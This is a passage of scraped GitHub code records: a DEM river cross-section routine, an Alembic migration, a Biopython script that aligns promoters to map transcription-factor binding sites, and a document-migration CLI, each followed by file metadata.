list(str(int(j))))[-3:])\n file_name = f'n{lat}_e{lng}_1arc_v3.tif' if lat_num+1 < 60 else f'n{lat}_e{lng}_1arc_v3_1201x1201.tif'\n self.tif_pathes.append(f'{DEMs_path}/{file_name}')\n \n # check if files 'exisits'\n success_list = []\n for tif_path in self.tif_pathes:\n if path.exists(tif_path) == False:\n print(f'{tif_path} is not exist in path {DEMs_path}')\n success_list.append(False)\n\n # Download DEM and preprocess it\n if len(success_list) == 0:\n print('All required DEMs exist')\n self.compute_DEM(self.tif_pathes, lng_num, lat_num, compression=1)\n else:\n # Temporary while I'm thinking what to with others frames DEMs\n print('Not all required DEMs exist')\n self.compression = 1\n self.acc = None\n self.dem = None\n self.fdir = None\n \n \n # Calculate Heights\n top_left = (lng_num-1, lat_num+2) if len(self.tif_pathes) == 9 else (lng_num, lat_num+1)\n bottom_right = (lng_num+2, lat_num-1) if len(self.tif_pathes) == 9 else (lng_num+1, lat_num)\n\n if self.dem is not None:\n point = self.coordinate2point(coordinate, top_left, bottom_right)\n \n # Coordinates for defining river path\n new_top_left, new_bottom_right = (point[0]-20, point[1]-20), (point[0]+20, point[1]+20)\n cut_fdir = self.fdir[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n cut_acc = self.acc[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n cut_dem = self.dem[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n\n # Graph for specified area\n G = nx.DiGraph()\n shape = cut_fdir.shape\n\n try:\n for row in range(1, shape[0]-1):\n for column in range(1, shape[1]-1):\n dir = cut_fdir[row, column]\n start = (row, column)\n target = self.fdir_coordinate(start, dir)\n G.add_edge(start, target)\n except:\n dct = {\n 'hstation_id': hstation_id, \n 'success': 0\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/river_slice_success_table.csv', sep=';', decimal=',', index=False)\n continue\n\n real_coord = (point[0] - new_top_left[0], point[1] - new_top_left[1])\n \n def out_node_G(node):\n return [node for node in G.edges(node)][0][1]\n \n def in_node_G(node):\n in_nodes = [edge[0] for edge in G.in_edges(node)]\n nodes_accumulation = [cut_acc[node[0], node[1]] for node in in_nodes]\n return in_nodes[nodes_accumulation.index(max(nodes_accumulation))]\n\n outs = [real_coord]\n while len(outs) < 5:\n out = out_node_G(outs[-1])\n outs.append(out)\n\n ins = [real_coord]\n while len(ins) < 5:\n in_ = in_node_G(ins[-1])\n ins.append(in_)\n \n # Clearing instances\n del G, new_top_left, new_bottom_right, cut_fdir, cut_acc, cut_dem\n \n \n # Coordinates for river shape\n# new_top_left, new_bottom_right = (point[0]-550, point[1]-550), (point[0]+550, point[1]+550)\n# cut_fdir = self.fdir[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n# cut_acc = self.acc[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n# cut_dem = self.dem[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n\n start, end = ins[-1], outs[-1]\n y_delta, x_delta = end[0] - start[0], end[1] - start[1]\n\n step = self.get_step(y_delta, x_delta)\n# real_coord = (point[0] - new_top_left[0], point[1] - new_top_left[1])\n# target_height = cut_dem[real_coord] + 15\n target_height = self.dem[point] + max_height\n# start = real_coord\n start = point\n\n# right_heights = [self.dem[real_coord]]\n# right_coords = [real_coord]\n right_heights = [self.dem[point]]\n right_coords = [point]\n 
while (max(right_heights) < target_height) and (len(right_heights) < 540):\n start = [sum(x) for x in zip(start, step)]\n# height = cut_dem[start[0], start[1]]\n height = self.dem[start[0], start[1]]\n right_heights.append(height)\n right_coords.append(start)\n\n# start = real_coord\n start = point\n step = [-i for i in step]\n# left_heights = [cut_dem[real_coord]]\n# left_coords = [real_coord]\n left_heights = [self.dem[point]]\n left_coords = [point]\n while (max(left_heights) < target_height) and (len(left_heights) < 540):\n start = [sum(x) for x in zip(start, step)]\n# height = cut_dem[start[0], start[1]]\n height = self.dem[start[0], start[1]]\n left_heights.append(height)\n left_coords.append(start)\n\n river_slice = left_heights[::-1] + right_heights[1:]\n coords_slice = left_coords[::-1] + right_coords[1:]\n coords_bin_slice = [0 if type(coord) != tuple else 1 for coord in coords_slice]\n\n if os.path.exists(f'{save_path}/{hstation_id}') == False:\n os.makedirs(f'{save_path}/{hstation_id}')\n\n path_to_csv = f'{save_path}/{hstation_id}/{hstation_id}_river_slice.csv'\n final_df = pd.DataFrame({'HEIGHTS': river_slice, 'WaterpostFlag': coords_bin_slice})\n final_df['meteres_path'] = 30 if lat_num+1 <= 60 else 60\n final_df.to_csv(path_to_csv, index=False, sep=';')\n \n dct = {\n 'hstation_id': hstation_id, \n 'max_height': max_height,\n 'success': 1\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{self.dt_string}_river_slice_success_table.csv', sep=';', decimal=',', index=False)\n \n else:\n # here is save for error hydropost (corner hydropost without all DEMs)\n dct = {\n 'hstation_id': hstation_id,\n 'max_height': max_height,\n 'success': 0\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{self.dt_string}_river_slice_success_table.csv', sep=';', decimal=',', index=False)\n", "repo_name": "nikitaoltyan/MCHS_WaterSheds", "sub_path": "Graph.py", "file_name": "Graph.py", "file_ext": "py", "file_size_in_byte": 27639, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "name"}, {"api_name": "WaterShed.WaterSheds", "line_number": 124, "usage_type": "call"}, {"api_name": "WaterShed.WaterSheds", "line_number": 133, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 166, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 214, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 225, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 298, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 427, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 435, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 438, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 438, "usage_type": "name"}, {"api_name": "pytz.timezone", 
"line_number": 438, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 467, "usage_type": "call"}, {"api_name": "os.path", "line_number": 467, "usage_type": "name"}, {"api_name": "networkx.DiGraph", "line_number": 498, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 586, "usage_type": "call"}, {"api_name": "os.path", "line_number": 586, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 587, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 590, "usage_type": "call"}]} +{"seq_id": "19628616589", "text": "\"\"\"add rendered to messages\n\nRevision ID: 7563cb70be2d\nRevises: f33cced0cb75\nCreate Date: 2022-05-14 10:06:18.749900+00:00\n\n\"\"\"\nimport sqlalchemy as sa\nimport sqlmodel\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"7563cb70be2d\"\ndown_revision = \"f33cced0cb75\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"messages\",\n sa.Column(\n \"rendered\",\n sqlmodel.sql.sqltypes.AutoString(),\n ),\n )\n # ### end Alembic commands ###\n\n # Set the rendered value to the current content and then make it non-null\n op.execute(\"UPDATE messages SET rendered = content\")\n op.alter_column(\"messages\", \"rendered\", nullable=False)\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"messages\", \"rendered\")\n # ### end Alembic commands ###\n", "repo_name": "WaffleHacks/application-portal", "sub_path": "common/database/migrations/versions/7563cb70be2d_add_rendered_to_messages.py", "file_name": "7563cb70be2d_add_rendered_to_messages.py", "file_ext": "py", "file_size_in_byte": 953, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlmodel.sql.sqltypes.AutoString", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlmodel.sql", "line_number": 25, "usage_type": "attribute"}, {"api_name": "alembic.op.execute", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 37, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "32899997897", "text": "import Bio.pairwise2 as pairwise2\nfrom Bio.pairwise2 import format_alignment\nimport Bio.motifs as motifs\nimport csv\nimport time\nimport re\n\nclass SubUnit_Object(object): \n def __init__(self, Cell_ID, Pathway, Reaction, Enzyme, SubUnit, Promoter_Sequence, Hash):\n self.Cell_Line = Cell_ID #The cell line this enzyme is found at. \n self.Pathway_ID = Pathway #Identity of the pathway this subunit serves.\n self.Reaction_ID = Reaction #Identity of the reaction this subunit serves.\n self.Enzyme_ID = Enzyme #Identity of the enzyme that contains this subunit. \n self.SubUnit_ID = SubUnit #ID of this subunit.\n self.Sequence = Promoter_Sequence #Promoter sequence of this subunit.\n self.Putative_Site = [] #Putative sites that has an impact on this subunit. 
In form of a list of dictionaries.\n self.Hash = Hash\n\n def read_site(self, Site_ID, Site_Location, Site_Sequence, Site_RC):\n #Takes input from file to create a list of dictionaries. \n self.Putative_Site.append({\"Site_ID\": Site_ID, \"Start_Location\": int(Site_Location),\n \"End_Location\": int(Site_Location) + len(Site_Sequence),\n \"Site_Sequence\": Site_Sequence, \"Reverse_Complement\": Site_RC})\n \n def align(self, Compared_Object, start=0, end=0, OpG_Penalty=-10, ExG_Penalty=-1, EndG_Penalty = False): \n #Align a given subunit or putative site to a part of this object. \n end = len(self.Sequence) if end == 0 else end\n Interest_Sq = self.Sequence[start:end].upper() #Sequence that we are interested to check. Is equal to entire sequence if no start and end location is given.\n Compared_Sq = Compared_Object if type(Compared_Object) == str else Compared_Object.Sequence.upper() #Sequence that we comparing.\n if Interest_Sq == \"\":\n return[[\"-\",\"-\",0]]\n Needleman = pairwise2.align.globalms(Interest_Sq, Compared_Sq, 5, -4, OpG_Penalty, ExG_Penalty, penalize_end_gaps = EndG_Penalty)\n return Needleman\n\n def find_site(self, Reference_Sq, Known_Coordinates, Index=0, Slash_Count=0, Is_End=0, Aligned=0): \n Updated_Start = 0\n Updated_End = 0\n \n if Aligned == 0:\n #Count number of slashes before the putative site. Do not count slashes as characters so that the final value of the while loop is \n # equal to initial location of the site.\n Known_Location = Known_Coordinates[1] if Is_End == 1 else Known_Coordinates[0] + 1\n while Index < Known_Location:\n if Reference_Sq[Index + Slash_Count] == \"-\":\n Slash_Count = Slash_Count + 1\n else:\n Index = Index + 1\n Updated_Start = Known_Location + Slash_Count if Is_End == 1 else Known_Location + Slash_Count - 1\n #After finding the initial location, call the function recursively but this time to find the new end location. \n if Is_End == 0:\n Updated_End = self.find_site(Reference_Sq, Known_Coordinates, Index, Slash_Count, Is_End=1)\n if Is_End == 1:\n return Updated_Start \n else:\n #If transferring from aligned to actual, remove slashes from before and within the sequence. \n Slash_Before_Start = Reference_Sq[0:Known_Coordinates[0]+1].count(\"-\")\n Slash_Before_End = Reference_Sq[0:Known_Coordinates[1]].count(\"-\")\n Shift = Slash_Before_End - Slash_Before_Start #If any gaps where removed from within the corresponding region, pull 1 char from both sides to make up for it. 
\n if Shift == Known_Coordinates[1] - Known_Coordinates[0] - 1: #If there are no matching sites corresponding to the sequence just return an emptry string location.\n return [0, 0]\n Updated_Start = Known_Coordinates[0] - Slash_Before_Start - Shift\n Updated_End = Known_Coordinates[1] - Slash_Before_End + Shift \n return [Updated_Start, Updated_End]\n\n def refine(self, ComparisonList):\n RefinedSites = []\n for Comparison in ComparisonList:\n string = Comparison[1]\n slashes = re.finditer(\"-\", string)\n match_pos = [slash.start() for slash in slashes]\n match_pos.insert(0, -1)\n match_pos.append(len(string)+1)\n\n for ind in range(len(match_pos)):\n if match_pos[ind+1] - match_pos[ind] > 1:\n start_str, end_str = match_pos[ind], match_pos[ind+1]\n break;\n RefinedSites.append(Comparison[0][start_str+1:end_str]) \n return RefinedSites\n\n def compare(self, Compared_Object):\n Alignment = self.align(Compared_Object)\n Alignment = Alignment[0]\n for Item in Compared_Object.Putative_Site:\n Aligned_Site_Locations = self.find_site(Alignment[1] , [Item[\"Start_Location\"], Item[\"End_Location\"]])\n Translated_Site_Locations = self.find_site(Alignment[0], Aligned_Site_Locations, Aligned = 1)\n if Translated_Site_Locations == [0,0]:\n continue;\n Hit_Achieved_Zone = self.Sequence[Translated_Site_Locations[0]:Translated_Site_Locations[1]]\n if len(Hit_Achieved_Zone) == len(Item[\"Site_Sequence\"]):\n Comparison = self.align(Item[\"Site_Sequence\"], Translated_Site_Locations[0], Translated_Site_Locations[1], OpG_Penalty=-100, EndG_Penalty = True)\n else:\n Comparison = self.align(Item[\"Site_Sequence\"], Translated_Site_Locations[0], Translated_Site_Locations[1], OpG_Penalty=-100)\n if Comparison[0][2] >= len(Item[\"Site_Sequence\"])*2 and \"-\" not in Comparison[0][0]:\n if len(Item[\"Site_Sequence\"]) < len(Hit_Achieved_Zone):\n Hit_Achieved_Zone = self.refine(Comparison)\n self.Putative_Site.append({\"Site_ID\": Item[\"Site_ID\"], \"Start_Location\": Translated_Site_Locations[0],\n \"End_Location\": Translated_Site_Locations[1], \"Site_Sequence\": Hit_Achieved_Zone,\n \"Motif\": Item[\"Site_Sequence\"], \"Reverse_Complement\": Item[\"Reverse_Complement\"]}) \n\n def count_site(self, Database_Directory):\n Site_Counts = {}\n with open(Database_Directory) as Database:\n for Motif in motifs.parse(Database, \"jaspar\"):\n Count = 0\n for Sites in self.Putative_Site:\n if Motif.name == Sites[\"Site_ID\"]:\n Count = Count + 1\n if Count == 0:\n continue;\n Site_Counts[Motif.name] = Count\n return Site_Counts\n \n def write(self, Database_Directory):\n Site_Counts = self.count_site(Database_Directory)\n Total_Count = sum(Site_Counts.values())\n Record = {\"Cell ID\": self.Cell_Line, \"Pathway\": self.Pathway_ID, \"Enzyme\": self.Enzyme_ID, \n \"Reaction\": self.Reaction_ID, \"SubUnit\": self.SubUnit_ID, \"Promoter\": self.Sequence, \n \"Sites\": self.Putative_Site, \"Site Counts\": Site_Counts, \"Site Index\": Total_Count/len(self.Sequence), \"Hash\" : self.Hash}\n return Record\n\ndef read_csv(csv_directory, File_Type):\n with open(csv_directory) as csv_file:\n Mode = \"\"\n if File_Type == \"Reference\":\n Reference_Dictionary_List = []\n Temporary_Dictionary = {}\n Temporary_Site_List = []\n Reader = csv.reader(csv_file, delimiter = \";\")\n for Row in Reader:\n #Read the current program and adjust what program is doing with respect to what you read.\n if Row == []:\n continue;\n Mode = (\"Read Sequence\" if Row[0] == \"Cell ID\" else \n (\"Read Factor\" if Row[0] == \"HIT ID\" else Mode))\n if 
(Row[0] == \"Enzyme ID\") or (Row[0] == \"HIT ID\"):\n continue;\n elif Row[0] == \"NULL\":\n Temporary_Dictionary[\"Sites\"] = Temporary_Site_List\n Reference_Dictionary_List.append({Key : Temporary_Dictionary[Key] for Key in Temporary_Dictionary.keys()})\n Temporary_Dictionary = {}\n Temporary_Site_List = []\n continue;\n #If the mode of the program is set, and its not a mode changing location, read the data.\n if Mode == \"Read Sequence\":\n Temporary_Dictionary = {\"Cell ID\": Row[0], \"Pathway\": Row[1], \"Reaction\": Row[2],\n \"Enzyme\": Row[3], \"SubUnit\": Row[4], \"Promoter\": Row[5], \"Hash\": Row[7]}\n elif Mode == \"Read Factor\":\n factorPosition = int(Row[1]) if int(Row[1]) >= 0 else len(Temporary_Dictionary[\"Promoter\"]) + int(Row[1])\n reverseComplement = 1 if int(Row[1]) <= 0 else 0\n Temporary_Site_List.append([Row[0], factorPosition, Row[5], reverseComplement])\n return Reference_Dictionary_List\n elif File_Type == \"Comparison\":\n Reader = csv.DictReader(csv_file, delimiter = \";\")\n Compared_Dictionary_List = []\n Temporary_Dictionary = {\"Cell ID\": \"\"} \n Hash_Tracker = [] \n for Row in Reader:\n if Row[\"Hash\"] in Hash_Tracker:\n continue;\n Hash_Tracker.append(Row[\"Hash\"])\n if Row[\"Compared Gene Name\"] == \"\":\n continue;\n Temporary_Dictionary[\"Cell ID\"] = Row[\"Compared Cell Line\"] if Temporary_Dictionary[\"Cell ID\"] == \"\" else Temporary_Dictionary[\"Cell ID\"] \n Temporary_Dictionary[\"SubUnit\"] = Row[\"Compared Gene Name\"]\n Temporary_Dictionary[\"Promoter\"] = Row[\"Compared Sequence\"]\n Temporary_Dictionary[\"Hash\"] = Row[\"Hash\"]\n if Row[\"Pathway\"] != \"\":\n Temporary_Dictionary[\"Pathway\"] = Row[\"Pathway\"]\n if Row[\"Reaction\"] != \"\":\n Temporary_Dictionary[\"Reaction\"] = Row[\"Reaction\"]\n if Row[\"Compared Enzyme\"] != \"\":\n Temporary_Dictionary[\"Enzyme\"] = Row[\"Compared Enzyme\"]\n \n Compared_Dictionary_List.append({Key : Temporary_Dictionary[Key] for Key in Temporary_Dictionary.keys()})\n return Compared_Dictionary_List \n elif File_Type == \"Pathway\":\n Pathway_Dict = {}\n Reader = csv.DictReader(csv_file, delimiter = \";\")\n for Row in Reader:\n if Row[\"Pathway\"] != \"\":\n Pathway_Dict[Row[\"Pathway\"]] = {}\n else:\n Row[\"Pathway\"] = list(Pathway_Dict.keys())[-1] \n if Row[\"Compared Enzyme\"] != \"\": \n Pathway_Dict[Row[\"Pathway\"]][Row[\"Compared Enzyme\"]] = {}\n else:\n Row[\"Compared Enzyme\"] = list(Pathway_Dict[Row[\"Pathway\"]].keys())[-1]\n Pathway_Dict[Row[\"Pathway\"]][Row[\"Compared Enzyme\"]][Row[\"Compared Gene Name\"]] = {}\n return Pathway_Dict \n\ndef measure_key_frequency(dict_of_dicts):\n frequency = {}\n for d in dict_of_dicts.values():\n for key in d.keys():\n frequency[key] = 1 if key not in frequency else frequency[key] + 1\n return frequency\n\ndef reverseComplement(sequence):\n complement = {\"A\": \"T\", \"T\": \"A\", \"C\": \"G\", \"G\":\"C\"}\n reverseSq = sequence[::-1]\n reverseComplementSq = \"\"\n for char in reverseSq:\n char = char.upper()\n reverseComplementSq += complement[char]\n return reverseComplementSq\n\nif __name__ == \"__main__\": \n Comparison_Directory = input(\"Please enter Comparison List directory\")\n Reference_Directory = input(\"Please enter Scanner Results' directory\")\n Database_Directory = input(\"Please enter Putative Site database directory\")\n start = time.time()\n\n Reference_Sequence_Dictionary = read_csv(Reference_Directory, \"Reference\")\n Compared_Sequence_Dictionary = read_csv(Comparison_Directory, \"Comparison\")\n Pathway_Dictionary 
= read_csv(Comparison_Directory, \"Pathway\")\n \n Result_Dictionary = {}\n SubResults = open(\"SubunitWideAnalysis.csv\", \"w\")\n SubResult_Writer = csv.writer(SubResults, delimiter = \";\")\n Enzyme_Results = open(\"EnzymeWideAnalysis.csv\", \"w\")\n EnzymeResult_Writer = csv.writer(Enzyme_Results, delimiter = \";\")\n Pathway_Results = open(\"PathwayWideAnalysis.csv\", \"w\")\n PathwayResult_Writer = csv.writer(Pathway_Results, delimiter = \";\")\n \n for SUBUNIT in Compared_Sequence_Dictionary:\n Compared_Sequence = SubUnit_Object(SUBUNIT[\"Cell ID\"], SUBUNIT[\"Pathway\"], SUBUNIT[\"Reaction\"],\n SUBUNIT[\"Enzyme\"], SUBUNIT[\"SubUnit\"], SUBUNIT[\"Promoter\"], SUBUNIT[\"Hash\"])\n for REFERENCE in Reference_Sequence_Dictionary:\n if SUBUNIT[\"Hash\"] == REFERENCE[\"Hash\"]:\n Reference_Sequence = SubUnit_Object(REFERENCE[\"Cell ID\"], REFERENCE[\"Pathway\"], REFERENCE[\"Reaction\"],\n REFERENCE[\"Enzyme\"], REFERENCE[\"SubUnit\"], REFERENCE[\"Promoter\"], REFERENCE[\"Hash\"])\n for Site in REFERENCE[\"Sites\"]: \n Reference_Sequence.read_site(Site[0],Site[1],Site[2], Site[3])\n Compared_Sequence.compare(Reference_Sequence)\n Resulting_Object = Compared_Sequence.write(Database_Directory)\n if SUBUNIT[\"SubUnit\"] in Result_Dictionary.keys():\n if type(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"]) != list:\n print(\"{}:\\t{}\".format(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"], Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"]))\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"] = [Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"]]\n print(\"{}:\\t{}\".format(Resulting_Object[\"Hash\"], Resulting_Object[\"Site Counts\"]))\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Sites\"] = Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Sites\"] + Resulting_Object[\"Sites\"]\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"].append(Resulting_Object[\"Hash\"])\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"] = {k: Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"].get(k, 0) + Resulting_Object[\"Site Counts\"].get(k, 0) for k in set(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"]) | set(Resulting_Object[\"Site Counts\"])}\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Index\"] = sum(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"].values())/len(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Promoter\"])\n else:\n Result_Dictionary[SUBUNIT[\"SubUnit\"]] = Resulting_Object\n\n for Pathway_Key in Pathway_Dictionary.keys():\n for Enzyme_Key in Pathway_Dictionary[Pathway_Key].keys():\n for SubUnit_Key in Pathway_Dictionary[Pathway_Key][Enzyme_Key].keys():\n Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key] = Result_Dictionary[SubUnit_Key]\n \n for Pathway_Key in Pathway_Dictionary.keys():\n Pathway_Sites_Dict = {}\n Pathway_Common_Keys = []\n for Enzyme_Key in Pathway_Dictionary[Pathway_Key].keys():\n Enzyme_Sites_Dict = {}\n Enzyme_Common_Keys = []\n for SubUnit_Key in Pathway_Dictionary[Pathway_Key][Enzyme_Key].keys():\n Pathway_Sites_Dict[SubUnit_Key] = (Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key][\"Site Counts\"])\n Enzyme_Sites_Dict[SubUnit_Key] = (Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key][\"Site Counts\"])\n Enzyme_Key_Frequency = measure_key_frequency(Enzyme_Sites_Dict)\n for Key in Enzyme_Key_Frequency:\n if Enzyme_Key_Frequency[Key] >= len(Enzyme_Sites_Dict)*0.15:\n Enzyme_Common_Keys.append([Key , Enzyme_Key_Frequency[Key]/len(Enzyme_Sites_Dict)])\n EnzymeResult_Writer.writerow([Pathway_Key, Enzyme_Key, 
Enzyme_Common_Keys])\n\n Pathway_Key_Frequency = measure_key_frequency(Pathway_Sites_Dict)\n for Key in Pathway_Key_Frequency:\n if Pathway_Key_Frequency[Key] >= len(Pathway_Sites_Dict)*0.15:\n Pathway_Common_Keys.append([Key, Pathway_Key_Frequency[Key]/len(Pathway_Sites_Dict)])\n PathwayResult_Writer.writerow([Pathway_Key, Pathway_Common_Keys])\n\n tf_Dict = {}\n for Key in Result_Dictionary.values():\n SubResult_Writer.writerow(list(Key.values()))\n for Site in Key[\"Sites\"]:\n if Site[\"Site_ID\"] in tf_Dict.keys():\n if type(Site[\"Site_Sequence\"]) == str:\n correctedSq = reverseComplement(Site[\"Site_Sequence\"]) if Site[\"Reverse_Complement\"] == 1 else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]].append(correctedSq)\n else:\n correctedSq = [reverseComplement(Sq) for Sq in Site[\"Site_Sequence\"]] if Site[\"Reverse_Complement\"] == 1 else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]] = tf_Dict[Site[\"Site_ID\"]] + correctedSq\n else:\n Site_Sequence_List = [Site[\"Site_Sequence\"]] if type(Site[\"Site_Sequence\"]) == str else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]] = [reverseComplement(Sq) for Sq in Site_Sequence_List] if Site[\"Reverse_Complement\"] == 1 else Site_Sequence_List\n \n tf_Matrix_Dict = {}\n for Key in tf_Dict.keys():\n seqList = tf_Dict[Key]\n fm = []\n for i in range(len(seqList[0])):\n fm.append({'A':0, 'C':0, 'T':0, 'G':0})\n for site in seqList:\n site = site.upper()\n fm[i][site[i]] = fm[i][site[i]] + 1\n tf_Matrix_Dict[Key] = fm\n\n with open(\"site.txt\",\"w\") as siteRes:\n for Key in tf_Matrix_Dict.keys():\n siteRes.write(\"> \" + Key + \"\\n\")\n for base in [\"A\",\"C\",\"G\",\"T\"]:\n siteRes.write(base + \" [\")\n for loc in tf_Matrix_Dict[Key]:\n digit = loc[base]\n siteRes.write(\"{:>6}\".format(digit))\n siteRes.write(\" ]\\n\")\n siteRes.write(\"\\n\")\n\n with open(\"targetTFs.txt\",\"w\") as targetTFs:\n for Key in [\"ADR1\", \"CAT8\", \"SIP4\", \"HAP234\", \"RDS2\", \"YBR239C\", \n \"STB5\", \"MSN2\", \"MSN4\", \"MIG1\", \"TYE7\", \"GCR1\"]:\n if Key in tf_Dict.keys(): \n targetTFs.write(\"{} \\n\".format(Key))\n for SiteSequence in tf_Dict[Key]:\n targetTFs.write(\"{} \\n\".format(SiteSequence))\n else:\n continue\n\n end = time.time()\n print(\"Run Time: %.3f\" %(end-start))\n", "repo_name": "Biocatalysis-CHE-METU/TFBS-Analysis-of-Pichia-pastoris", "sub_path": "Searching Algorithm/Aligner.py", "file_name": "Aligner.py", "file_ext": "py", "file_size_in_byte": 18832, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.pairwise2.align.globalms", "line_number": 32, "usage_type": "call"}, {"api_name": "Bio.pairwise2.align", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Bio.pairwise2", "line_number": 32, "usage_type": "name"}, {"api_name": "re.finditer", "line_number": 69, "usage_type": "call"}, {"api_name": "Bio.motifs.parse", "line_number": 104, "usage_type": "call"}, {"api_name": "Bio.motifs", "line_number": 104, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 129, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 154, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 179, "usage_type": "call"}, {"api_name": "time.time", "line_number": 212, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 220, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 222, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 224, "usage_type": "call"}, 
{"api_name": "time.time", "line_number": 322, "usage_type": "call"}]} +{"seq_id": "32006517156", "text": "import argparse\n\nfrom migration.config import (\n document_cfgs,\n source_db_cfg,\n destination_db_cfg,\n internal_db_cfg,\n)\nfrom migration.migration_utility.configuration.db_configuration import DbConfigurator\nfrom migration.migration_utility.configuration.document_configuration import (\n DocumentConfiguration,\n)\nfrom migration.migration_utility.controller.migration_controller import (\n MigrationController,\n)\nimport sys\n\n\ndef main(\n reset_migration: bool = False,\n force_migration: bool = False,\n flow: str = \"flat\"\n):\n \"\"\"main.\"\"\"\n\n document_config_models = [DocumentConfiguration(**cfg) for cfg in document_cfgs]\n source_db_cfg_model = DbConfigurator(**source_db_cfg)\n destination_db_cfg_model = DbConfigurator(**destination_db_cfg)\n internal_db_cfg_model = DbConfigurator(**internal_db_cfg)\n\n migration_ctrl = MigrationController(\n source_db_config=source_db_cfg_model,\n destination_db_config=destination_db_cfg_model,\n internal_db_config=internal_db_cfg_model,\n document_configs=document_config_models,\n flow=flow\n )\n\n migration_ctrl.migrate(reset_migration=reset_migration, force_migration=force_migration)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--reset\", action=\"store_true\", help=\"Resets all previously migrated documents to is_migrated=True state\")\n parser.add_argument(\"--force\", action=\"store_true\", help=\"Forces a repeated migration over all documents\")\n parser.add_argument(\"--id_list_path\", default=None, help=\"Path to a file with list of IDs to migrate\")\n parser.add_argument(\"--flow\", default=\"flat\", help=\"Specifies the migration flow\")\n\n args = parser.parse_args()\n\n main(\n reset_migration=args.reset,\n force_migration=args.force,\n flow=args.flow\n )\n", "repo_name": "tigrankh/migration", "sub_path": "migration/migrate.py", "file_name": "migrate.py", "file_ext": "py", "file_size_in_byte": 1860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": 